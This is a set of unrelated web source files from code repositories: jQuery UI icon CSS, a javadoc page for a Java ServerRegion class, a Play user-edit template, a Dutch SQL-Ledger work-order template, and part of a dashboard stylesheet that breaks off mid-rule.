.ui-icon-arrow-2-ne-sw { background-position: -144px -32px; }
.ui-icon-arrow-2-e-w { background-position: -160px -32px; }
.ui-icon-arrow-2-se-nw { background-position: -176px -32px; }
.ui-icon-arrowstop-1-n { background-position: -192px -32px; }
.ui-icon-arrowstop-1-e { background-position: -208px -32px; }
.ui-icon-arrowstop-1-s { background-position: -224px -32px; }
.ui-icon-arrowstop-1-w { background-position: -240px -32px; }
.ui-icon-arrowthick-1-n { background-position: 0 -48px; }
.ui-icon-arrowthick-1-ne { background-position: -16px -48px; }
.ui-icon-arrowthick-1-e { background-position: -32px -48px; }
.ui-icon-arrowthick-1-se { background-position: -48px -48px; }
.ui-icon-arrowthick-1-s { background-position: -64px -48px; }
.ui-icon-arrowthick-1-sw { background-position: -80px -48px; }
.ui-icon-arrowthick-1-w { background-position: -96px -48px; }
.ui-icon-arrowthick-1-nw { background-position: -112px -48px; }
.ui-icon-arrowthick-2-n-s { background-position: -128px -48px; }
.ui-icon-arrowthick-2-ne-sw { background-position: -144px -48px; }
.ui-icon-arrowthick-2-e-w { background-position: -160px -48px; }
.ui-icon-arrowthick-2-se-nw { background-position: -176px -48px; }
.ui-icon-arrowthickstop-1-n { background-position: -192px -48px; }
.ui-icon-arrowthickstop-1-e { background-position: -208px -48px; }
.ui-icon-arrowthickstop-1-s { background-position: -224px -48px; }
.ui-icon-arrowthickstop-1-w { background-position: -240px -48px; }
.ui-icon-arrowreturnthick-1-w { background-position: 0 -64px; }
.ui-icon-arrowreturnthick-1-n { background-position: -16px -64px; }
.ui-icon-arrowreturnthick-1-e { background-position: -32px -64px; }
.ui-icon-arrowreturnthick-1-s { background-position: -48px -64px; }
.ui-icon-arrowreturn-1-w { background-position: -64px -64px; }
.ui-icon-arrowreturn-1-n { background-position: -80px -64px; }
.ui-icon-arrowreturn-1-e { background-position: -96px -64px; }
.ui-icon-arrowreturn-1-s { background-position: -112px -64px; }
.ui-icon-arrowrefresh-1-w { background-position: -128px -64px; }
.ui-icon-arrowrefresh-1-n { background-position: -144px -64px; }
.ui-icon-arrowrefresh-1-e { background-position: -160px -64px; }
.ui-icon-arrowrefresh-1-s { background-position: -176px -64px; }
.ui-icon-arrow-4 { background-position: 0 -80px; }
.ui-icon-arrow-4-diag { background-position: -16px -80px; }
.ui-icon-extlink { background-position: -32px -80px; }
.ui-icon-newwin { background-position: -48px -80px; }
.ui-icon-refresh { background-position: -64px -80px; }
.ui-icon-shuffle { background-position: -80px -80px; }
.ui-icon-transfer-e-w { background-position: -96px -80px; }
.ui-icon-transferthick-e-w { background-position: -112px -80px; }
.ui-icon-folder-collapsed { background-position: 0 -96px; }
.ui-icon-folder-open { background-position: -16px -96px; }
.ui-icon-document { background-position: -32px -96px; }
.ui-icon-document-b { background-position: -48px -96px; }
.ui-icon-note { background-position: -64px -96px; }
.ui-icon-mail-closed { background-position: -80px -96px; }
.ui-icon-mail-open { background-position: -96px -96px; }
.ui-icon-suitcase { background-position: -112px -96px; }
.ui-icon-comment { background-position: -128px -96px; }
.ui-icon-person { background-position: -144px -96px; }
.ui-icon-print { background-position: -160px -96px; }
.ui-icon-trash { background-position: -176px -96px; }
.ui-icon-locked { background-position: -192px -96px; }
.ui-icon-unlocked { background-position: -208px -96px; }
.ui-icon-bookmark { background-position: -224px -96px; }
.ui-icon-tag { background-position: -240px -96px; }
.ui-icon-home { background-position: 0 -112px; }
.ui-icon-flag { background-position: -16px -112px; }
.ui-icon-calendar { background-position: -32px -112px; }
.ui-icon-cart { background-position: -48px -112px; }
.ui-icon-pencil { background-position: -64px -112px; }
.ui-icon-clock { background-position: -80px -112px; }
.ui-icon-disk { background-position: -96px -112px; }
.ui-icon-calculator { background-position: -112px -112px; }
.ui-icon-zoomin { background-position: -128px -112px; }
.ui-icon-zoomout { background-position: -144px -112px; }
.ui-icon-search { background-position: -160px -112px; }
.ui-icon-wrench { background-position: -176px -112px; }
.ui-icon-gear { background-position: -192px -112px; }
.ui-icon-heart { background-position: -208px -112px; }
.ui-icon-star { background-position: -224px -112px; }
.ui-icon-link { background-position: -240px -112px; }
.ui-icon-cancel { background-position: 0 -128px; }
.ui-icon-plus { background-position: -16px -128px; }
.ui-icon-plusthick { background-position: -32px -128px; }
.ui-icon-minus { background-position: -48px -128px; }
.ui-icon-minusthick { background-position: -64px -128px; }
.ui-icon-close { background-position: -80px -128px; }
.ui-icon-closethick { background-position: -96px -128px; }
.ui-icon-key { background-position: -112px -128px; }
.ui-icon-lightbulb { background-position: -128px -128px; }
.ui-icon-scissors { background-position: -144px -128px; }
.ui-icon-clipboard { background-position: -160px -128px; }
.ui-icon-copy { background-position: -176px -128px; }
.ui-icon-contact { background-position: -192px -128px; }
.ui-icon-image { background-position: -208px -128px; }
.ui-icon-video { background-position: -224px -128px; }
.ui-icon-script { background-position: -240px -128px; }
.ui-icon-alert { background-position: 0 -144px; }
.ui-icon-info { background-position: -16px -144px; }
.ui-icon-notice { background-position: -32px -144px; }
.ui-icon-help { background-position: -48px -144px; }
.ui-icon-check { background-position: -64px -144px; }
.ui-icon-bullet { background-position: -80px -144px; }
.ui-icon-radio-on { background-position: -96px -144px; }
.ui-icon-radio-off { background-position: -112px -144px; }
.ui-icon-pin-w { background-position: -128px -144px; }
.ui-icon-pin-s { background-position: -144px -144px; }
.ui-icon-play { background-position: 0 -160px; }
.ui-icon-pause { background-position: -16px -160px; }
.ui-icon-seek-next { background-position: -32px -160px; }
.ui-icon-seek-prev { background-position: -48px -160px; }
.ui-icon-seek-end { background-position: -64px -160px; }
.ui-icon-seek-start { background-position: -80px -160px; }
/* ui-icon-seek-first is deprecated, use ui-icon-seek-start instead */
.ui-icon-seek-first { background-position: -80px -160px; }
.ui-icon-stop { background-position: -96px -160px; }
.ui-icon-eject { background-position: -112px -160px; }
.ui-icon-volume-off { background-position: -128px -160px; }
.ui-icon-volume-on { background-position: -144px -160px; }
.ui-icon-power { background-position: 0 -176px; }
.ui-icon-signal-diag { background-position: -16px -176px; }
.ui-icon-signal { background-position: -32px -176px; }
.ui-icon-battery-0 { background-position: -48px -176px; }
.ui-icon-battery-1 { background-position: -64px -176px; }
.ui-icon-battery-2 { background-position: -80px -176px; }
.ui-icon-battery-3 { background-position: -96px -176px; }
.ui-icon-circle-plus { background-position: 0 -192px; }
.ui-icon-circle-minus { background-position: -16px -192px; }
.ui-icon-circle-close { background-position: -32px -192px; }
.ui-icon-circle-triangle-e { background-position: -48px -192px; }
.ui-icon-circle-triangle-s { background-position: -64px -192px; }
.ui-icon-circle-triangle-w { background-position: -80px -192px; }
.ui-icon-circle-triangle-n { background-position: -96px -192px; }
.ui-icon-circle-arrow-e { background-position: -112px -192px; }
.ui-icon-circle-arrow-s { background-position: -128px -192px; }
.ui-icon-circle-arrow-w { background-position: -144px -192px; }
.ui-icon-circle-arrow-n { background-position: -160px -192px; }
.ui-icon-circle-zoomin { background-position: -176px -192px; }
.ui-icon-circle-zoomout { background-position: -192px -192px; }
.ui-icon-circle-check { background-position: -208px -192px; }
.ui-icon-circlesmall-plus { background-position: 0 -208px; }
.ui-icon-circlesmall-minus { background-position: -16px -208px; }
.ui-icon-circlesmall-close { background-position: -32px -208px; }
.ui-icon-squaresmall-plus { background-position: -48px -208px; }
.ui-icon-squaresmall-minus { background-position: -64px -208px; }
.ui-icon-squaresmall-close { background-position: -80px -208px; }
.ui-icon-grip-dotted-vertical { background-position: 0 -224px; }
.ui-icon-grip-dotted-horizontal { background-position: -16px -224px; }
.ui-icon-grip-solid-vertical { background-position: -32px -224px; }
.ui-icon-grip-solid-horizontal { background-position: -48px -224px; }
.ui-icon-gripsmall-diagonal-se { background-position: -64px -224px; }
.ui-icon-grip-diagonal-se { background-position: -80px -224px; }
/* Misc visuals
----------------------------------*/
/* Corner radius */
.ui-corner-all,
.ui-corner-top,
.ui-corner-left,
.ui-corner-tl {
border-top-left-radius: 4px;
}
.ui-corner-all,
.ui-corner-top,
.ui-corner-right,
.ui-corner-tr {
border-top-right-radius: 4px;
}
.ui-corner-all,
.ui-corner-bottom,
.ui-corner-left,
.ui-corner-bl {
border-bottom-left-radius: 4px;
}
.ui-corner-all,
.ui-corner-bottom,
.ui-corner-right,
.ui-corner-br {
border-bottom-right-radius: 4px;
}
/* Overlays */
.ui-widget-overlay {
background: #aaaaaa url("images/ui-bg_flat_0_aaaaaa_40x100.png") 50% 50% repeat-x;
opacity: .3;
filter: Alpha(Opacity=30); /* support: IE8 */
}
.ui-widget-shadow {
margin: -8px 0 0 -8px;
padding: 8px;
background: #aaaaaa url("images/ui-bg_flat_0_aaaaaa_40x100.png") 50% 50% repeat-x;
opacity: .3;
filter: Alpha(Opacity=30); /* support: IE8 */
border-radius: 8px;
}
|
doc/projectstructures/ServerRegion.html | Zyoruk/3rdProject | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (version 1.7.0_45) on Fri Nov 22 15:43:21 CST 2013 -->
<title>ServerRegion</title>
<meta name="date" content="2013-11-22">
<link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="ServerRegion";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/ServerRegion.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li><a href="../index-files/index-1.html">Index</a></li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../projectstructures/Region.html" title="class in projectstructures"><span class="strong">Prev Class</span></a></li>
<li>Next Class</li>
</ul>
<ul class="navList">
<li><a href="../index.html?projectstructures/ServerRegion.html" target="_top">Frames</a></li>
<li><a href="ServerRegion.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#methods_inherited_from_class_projectstructures.Region">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">projectstructures</div>
<h2 title="Class ServerRegion" class="title">Class ServerRegion<K></h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li><a href="../datastructs/graphs/Vertex.html" title="class in datastructs.graphs">datastructs.graphs.Vertex</a><K></li>
<li>
<ul class="inheritance">
<li><a href="../projectstructures/Region.html" title="class in projectstructures">projectstructures.Region</a><K></li>
<li>
<ul class="inheritance">
<li>projectstructures.ServerRegion<K></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">ServerRegion<K></span>
extends <a href="../projectstructures/Region.html" title="class in projectstructures">Region</a><K></pre>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../projectstructures/ServerRegion.html#ServerRegion(projectstructures.Domain)">ServerRegion</a></strong>(<a href="../projectstructures/Domain.html" title="class in projectstructures">Domain</a> domain)</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_projectstructures.Region">
<!-- -->
</a>
<h3>Methods inherited from class projectstructures.<a href="../projectstructures/Region.html" title="class in projectstructures">Region</a></h3>
<code><a href="../projectstructures/Region.html#getBounty()">getBounty</a>, <a href="../projectstructures/Region.html#getID()">getID</a>, <a href="../projectstructures/Region.html#getRegionID()">getRegionID</a>, <a href="../projectstructures/Region.html#giveToOtherRegion(projectstructures.Region)">giveToOtherRegion</a>, <a href="../projectstructures/Region.html#haveBountyHunter()">haveBountyHunter</a>, <a href="../projectstructures/Region.html#receiveBountyHunter(projectstructures.BountyHunter)">receiveBountyHunter</a>, <a href="../projectstructures/Region.html#setBounty(int)">setBounty</a>, <a href="../projectstructures/Region.html#setBountyHunter(projectstructures.BountyHunter)">setBountyHunter</a>, <a href="../projectstructures/Region.html#setID()">setID</a></code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_datastructs.graphs.Vertex">
<!-- -->
</a>
<h3>Methods inherited from class datastructs.graphs.<a href="../datastructs/graphs/Vertex.html" title="class in datastructs.graphs">Vertex</a></h3>
<code><a href="../datastructs/graphs/Vertex.html#connectTo(datastructs.graphs.Vertex, int)">connectTo</a>, <a href="../datastructs/graphs/Vertex.html#getAdjacentVertexes()">getAdjacentVertexes</a>, <a href="../datastructs/graphs/Vertex.html#getConnections()">getConnections</a>, <a href="../datastructs/graphs/Vertex.html#getElement()">getElement</a>, <a href="../datastructs/graphs/Vertex.html#getIfProcessed()">getIfProcessed</a>, <a href="../datastructs/graphs/Vertex.html#setElement(K)">setElement</a>, <a href="../datastructs/graphs/Vertex.html#setIfProcessed(boolean)">setIfProcessed</a></code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="ServerRegion(projectstructures.Domain)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>ServerRegion</h4>
<pre>public ServerRegion(<a href="../projectstructures/Domain.html" title="class in projectstructures">Domain</a> domain)</pre>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/ServerRegion.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li><a href="../index-files/index-1.html">Index</a></li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../projectstructures/Region.html" title="class in projectstructures"><span class="strong">Prev Class</span></a></li>
<li>Next Class</li>
</ul>
<ul class="navList">
<li><a href="../index.html?projectstructures/ServerRegion.html" target="_top">Frames</a></li>
<li><a href="ServerRegion.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#methods_inherited_from_class_projectstructures.Region">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
app/org/iatoki/judgels/uriel/user/editUserView.scala.html | judgels/uriel | @import play.i18n.Messages
@import org.iatoki.judgels.play.views.html.formErrorView
@import org.iatoki.judgels.uriel.user.UserEditForm
@import org.iatoki.judgels.uriel.user.routes
@(userEditForm: Form[UserEditForm], userId: Long)
@implicitFieldConstructor = @{ b3.horizontal.fieldConstructor("col-md-3", "col-md-9") }
@formErrorView(userEditForm)
@b3.form(routes.UserController.postEditUser(userId)) {
@helper.CSRF.formField
@b3.text(userEditForm("roles"), '_label -> Messages.get("user.roles"), 'class -> "form-control")
@b3.submit('class -> "btn btn-primary") { @Messages.get("commons.update") }
}
|
templates/Dutch-work_order.html | ledger123/ledger123 |
<body bgcolor=ffffff>
<table width=100%>
<tr>
<td width=10> </td>
<td>
<table width=100%>
<tr valign=bottom>
<td>
<h4>
<%company%>
<br><%address%>
</h4>
</td>
<th><img src=http://www.sql-ledger.org/images/sql-ledger.png border=0 width=80 height=58></th>
<td align=right>
<h4>
Tel: <%tel%>
<br>Fax: <%fax%>
</h4>
</td>
</tr>
<tr>
<th colspan=3>
<h4>W E R K B O N</h4>
</th>
</tr>
</table>
</td>
</tr>
<tr>
<td> </td>
<td>
<table width=100% callspacing=0 cellpadding=0>
<tr bgcolor=000000>
<th align=left width=50%><font color=ffffff>Voor</th>
<th align=left width=50%><font color=ffffff>Verzendadres</th>
</tr>
<tr valign=top>
<td><%name%>
<br><%address1%>
<%if address2%>
<br><%address2%>
<%end address2%>
<br><%city%> <%state%>
<br><%zipcode%>
<%if country%>
<br><%country%>
<%end country%>
<br>
<%if contact%>
<br>t.a.v. <%contact%>
<%end contact%>
<%if customerphone%>
<br>Tel: <%customerphone%>
<%end customerphone%>
<%if customerfax%>
<br>Fax: <%customerfax%>
<%end customerfax%>
<%if email%>
<br><%email%>
<%end email%>
</td>
<td><%shiptoname%>
<br><%shiptoaddress1%>
<%if shiptoaddress2%>
<br><%shiptoaddress2%>
<%end shiptoaddress2%>
<br><%shiptocity%> <%shiptostate%>
<br><%shiptozipcode%>
<%if shiptocountry%>
<br><%shiptocountry%>
<%end shiptocountry%>
<br>
<%if shiptocontact%>
<br><%shiptocontact%>
<%end shiptocontact%>
<%if shiptophone%>
<br>Tel: <%shiptophone%>
<%end shiptophone%>
<%if shiptofax%>
<br>Fax: <%shiptofax%>
<%end shiptofax%>
<%if shiptoemail%>
<br><%shiptoemail%>
<%end shiptoemail%>
</td>
</tr>
</table>
</td>
</tr>
<tr height=5></tr>
<tr>
<td> </td>
<td>
<table width=100% border=1>
<tr>
<th width=17% align=left nowrap>Order Nr</th>
<th width=17% align=left>Order Datum</th>
<th width=17% align=left>Gewenste Leverdatum</th>
<th width=17% align=left nowrap>Verkoper</th>
<th width=17% align=left nowrap>Verzenden vanaf</th>
<th width=15% align=left nowrap>Verzenden via</th>
</tr>
<tr>
<td><%ordnumber%></td>
<td><%orddate%></td>
<td><%reqdate%></td>
<td><%employee%></td>
<td><%shippingpoint%> </td>
<td><%shipvia%> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td> </td>
<td>
<table width=100%>
<tr bgcolor=000000>
<th align=right><font color=ffffff>No.</th>
<th align=left><font color=ffffff>Nummer</th>
<th align=left><font color=ffffff>Omschrijving</th>
<th><font color=ffffff>Hoeveelheid</th>
<th> </th>
<th><font color=ffffff>Serie Nr.</th>
</tr>
<%foreach number%>
<tr valign=top>
<td align=right><%runningnumber%>.</td>
<td><%number%></td>
<td><%description%></td>
<td align=right><%qty%></td>
<td><%unit%></td>
<td><%serialnumber%></td>
</tr>
<%end number%>
<tr>
<td colspan=6><hr noshade></td>
</tr>
</table>
</td>
</tr>
<tr>
<td> </td>
<%if notes%>
<td><%notes%></td>
<%end notes%>
</tr>
</table>
</body>
</html>
|
public/css/style.css | andhikamaheva/dev | /*
Template Name: Flat Lab Dashboard build with Bootstrap v3.0.2
Template Version: 1.2.0
Author: Mosaddek Hossain
Website: http://thevectorlab.net/
*/
/* Import fonts */
@import url(http://fonts.googleapis.com/css?family=Open+Sans:400,300,300italic,400italic,600,600italic,700,700italic,800,800italic);
body {
color: black;
background: #f1f2f7;
font-family: 'Open Sans', sans-serif;
padding: 0px !important;
margin: 0px !important;
font-size:13px;
}
ul li {
list-style: none;
}
a, a:hover, a:focus {
text-decoration: none;
outline: none;
}
::selection {
background: #FF6C60;
color: #fff;
}
::-moz-selection {
background: #FF6C60;
color: #fff;
}
#container {
width: 100%;
height: 100%;
}
/*login page*/
.login-logo{
margin: 40px auto;
background-size: 150px 130px;
background-image: url(../img/logoSI2.png);
opacity: 100%;
background-repeat: none;
max-width: 150px;
height: 130px;
margin-bottom: 5px;
}
.login-body {
background-color: #f1f2f7;
}
.form-signin {
max-width: 330px;
margin: 30px auto 0;
background: #fff;
border-radius: 5px;
-webkit-border-radius: 5px;
}
.form-signin h2.form-signin-heading {
margin: 0;
padding:20px 15px;
text-align: center;
background: #41cac0;
border-radius: 5px 5px 0 0;
-webkit-border-radius: 5px 5px 0 0;
color: #fff;
font-size: 18px;
text-transform: uppercase;
font-weight: 300;
font-family: 'Open Sans', sans-serif;
}
.form-signin .checkbox {
margin-bottom: 14px;
}
.form-signin .checkbox {
font-weight: normal;
color: #b6b6b6;
font-weight: 300;
font-family: 'Open Sans', sans-serif;
}
.form-signin .form-control {
position: relative;
font-size: 16px;
height: auto;
padding: 10px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="text"], .form-signin input[type="password"] {
margin-bottom: 15px;
border-radius: 5px;
-webkit-border-radius: 5px;
border: 1px solid #eaeaea;
box-shadow: none;
font-size: 12px;
}
.form-signin .btn-login {
background: #f67a6e;
color: #fff;
text-transform: uppercase;
font-weight: 300;
font-family: 'Open Sans', sans-serif;
box-shadow: 0 4px #e56b60;
margin-bottom: 20px;
}
.form-signin p {
text-align: center;
color: #b6b6b6;
font-size: 16px;
font-weight: 300;
}
.form-signin a {
color: #41cac0;
}
.form-signin a:hover {
color: #b6b6b6;
}
.login-wrap {
padding: 20px;
}
.login-social-link {
display: inline-block;
margin-top: 20px;
margin-bottom: 15px;
}
.login-social-link a {
color: #fff;
padding: 15px 28px;
border-radius: 4px;
}
.login-social-link a:hover {
color: #fff;
}
.login-social-link a i {
font-size: 20px;
padding-right: 10px;
}
.login-social-link a.facebook {
background: #5193ea;
margin-right: 22px;
box-shadow: 0 4px #2775e2;
float:left;
}
.login-social-link a.twitter {
background: #44ccfe;
box-shadow: 0 4px #2bb4e8;
float:left;
}
/*sidebar navigation*/
#sidebar {
width: 210px;
height: 100%;
position: fixed;
background: #2a3542;
}
#sidebar ul li {
position: relative;
}
#sidebar .sub-menu > .sub li {
padding-left: 32px;
}
#sidebar .sub-menu > .sub li:last-child {
padding-bottom: 10px;
}
/*LEFT NAVIGATION ICON*/
.dcjq-icon {
height:17px;
width:17px;
display:inline-block;
background: url(../img/nav-expand.png) no-repeat top;
border-radius:3px;
-moz-border-radius:3px;
-webkit-border-radius:3px;
position:absolute;
right:10px;
top:15px;
}
.active .dcjq-icon {
background: url(../img/nav-expand.png) no-repeat bottom;
border-radius:3px;
-moz-border-radius:3px;
-webkit-border-radius:3px;
}
/*---*/
.nav-collapse.collapse {
display: inline;
}
ul.sidebar-menu , ul.sidebar-menu li ul.sub{
margin: -2px 0 0;
padding: 0;
}
ul.sidebar-menu {
margin-top: 75px;
}
#sidebar > ul > li > ul.sub {
display: none;
}
#sidebar > ul > li.active > ul.sub, #sidebar > ul > li > ul.sub > li > a {
display: block;
}
ul.sidebar-menu li ul.sub li{
background: #35404D;
margin-bottom: 0;
margin-left: 0;
margin-right: 0;
}
ul.sidebar-menu li ul.sub li:last-child{
border-radius: 0 0 4px 4px;
-webkit-border-radius: 0 0 4px 4px;
}
ul.sidebar-menu li ul.sub li a {
font-size: 12px;
padding: 6px 0;
line-height: 35px;
height: 35px;
-webkit-transition: all 0.3s ease;
-moz-transition: all 0.3s ease;
-o-transition: all 0.3s ease;
-ms-transition: all 0.3s ease;
transition: all 0.3s ease;
color: #aeb2b7;
}
ul.sidebar-menu li ul.sub li a:hover, ul.sidebar-menu li ul.sub li.active a {
color: #FF6C60;
-webkit-transition: all 0.3s ease;
-moz-transition: all 0.3s ease;
-o-transition: all 0.3s ease;
-ms-transition: all 0.3s ease;
transition: all 0.3s ease;
display: block;
}
ul.sidebar-menu li{
/*line-height: 20px !important;*/
margin-bottom: 5px;
margin-left:10px;
margin-right:10px;
}
ul.sidebar-menu li.sub-menu{
line-height: 15px;
}
ul.sidebar-menu li a span{
display: inline-block;
}
ul.sidebar-menu li a{
color: #aeb2b7;
text-decoration: none;
display: block;
padding: 15px 0 15px 10px;
font-size: 12px;
outline: none;
-webkit-transition: all 0.3s ease;
-moz-transition: all 0.3s ease;
-o-transition: all 0.3s ease;
-ms-transition: all 0.3s ease;
transition: all 0.3s ease;
}
ul.sidebar-menu li a.active, ul.sidebar-menu li a:hover, ul.sidebar-menu li a:focus {
background: #35404d;
color: #fff;
display: block;
border-radius: 4px;
-webkit-border-radius: 4px;
-webkit-transition: all 0.3s ease;
-moz-transition: all 0.3s ease;
-o-transition: all 0.3s ease;
-ms-transition: all 0.3s ease;
transition: all 0.3s ease;
}
ul.sidebar-menu li a i {
font-size: 15px;
padding-right: 6px;
}
ul.sidebar-menu li a:hover i, ul.sidebar-menu li a:focus i {
color: #FF6C60;
}
ul.sidebar-menu li a.active i {
color: #FF6C60;
}
.mail-info, .mail-info:hover {
margin: -3px 6px 0 0;
font-size: 11px;
}
/*main content*/
#main-content {
margin-left: 210px;
}
.header, .footer {
min-height: 60px;
padding: 0 15px;
}
.header {
position: fixed;
left: 0;
right: 0;
z-index: 1002;
}
.white-bg {
background: #fff;
border-bottom: 1px solid #f1f2f7;
}
.wrapper {
display: inline-block;
margin-top: 60px;
padding: 15px;
width: 100%;
}
a.logo {
font-size: 21px;
color: #2e2e2e;
float: left;
margin-top: 15px;
text-transform: uppercase;
}
a.logo:hover, a.logo:focus {
text-decoration: none;
outline: none;
}
a.logo span {
color: #FF6C60;
}
/*notification*/
#top_menu .nav > li, ul.top-menu > li {
float: left;
}
.notify-row {
float: left;
margin-top: 15px;
margin-left: 92px;
}
ul.top-menu > li > a {
color: #666666;
font-size: 16px;
border-radius: 4px;
-webkit-border-radius: 4px;
border:1px solid #f0f0f8 !important;
padding: 2px 6px;
margin-right: 15px;
}
ul.top-menu > li > a:hover, ul.top-menu > li > a:focus {
border:1px solid #f0f0f8 !important;
background-color: #fff!important;
border-color: #f0f0f8 !important;
text-decoration: none;
border-radius: 4px;
-webkit-border-radius: 4px;
color: #2E2E2E !important;
}
.notify-row .badge {
position: absolute;
right: -10px;
top: -10px;
z-index: 100;
}
.dropdown-menu.extended {
max-width: 300px !important;
min-width: 160px !important;
top: 42px;
width: 235px !important;
padding: 0;
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.176) !important;
border: none !important;
border-radius: 4px;
-webkit-border-radius: 4px;
}
@media screen and (-webkit-min-device-pixel-ratio:0) {
/* Safari and Chrome */
.dropdown-menu.extended {
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.176) !important;
};
}
.dropdown-menu.extended li p {
background-color: #F1F2F7;
color: #666666;
margin: 0;
padding: 10px;
border-radius: 4px 4px 0px 0px;
-webkit-border-radius: 4px 4px 0px 0px;
}
.dropdown-menu.extended li p.green {
background-color: #a9d86e;
color: #fff;
}
.dropdown-menu.extended li p.red {
background-color: #ff6c60;
color: #fff;
}
.dropdown-menu.extended li p.yellow {
background-color: #fcb322;
color: #fff;
}
.dropdown-menu.extended li a {
border-bottom: 1px solid #EBEBEB !important;
font-size: 12px;
list-style: none;
}
.dropdown-menu.extended li a {
padding: 15px 10px !important;
width: 100%;
display: inline-block;
}
.dropdown-menu.extended li a:hover {
background-color: #F7F8F9 !important;
color: #2E2E2E;
}
.dropdown-menu.tasks-bar .task-info .desc {
font-size: 13px;
font-weight: normal;
}
.dropdown-menu.tasks-bar .task-info .percent {
display: inline-block;
float: right;
font-size: 13px;
font-weight: 600;
padding-left: 10px;
margin-top: -4px;
}
.dropdown-menu.extended .progress {
margin-bottom: 0 !important;
height: 10px;
}
.dropdown-menu.inbox li a .photo img {
border-radius: 2px 2px 2px 2px;
float: left;
height: 40px;
margin-right: 4px;
width: 40px;
}
.dropdown-menu.inbox li a .subject {
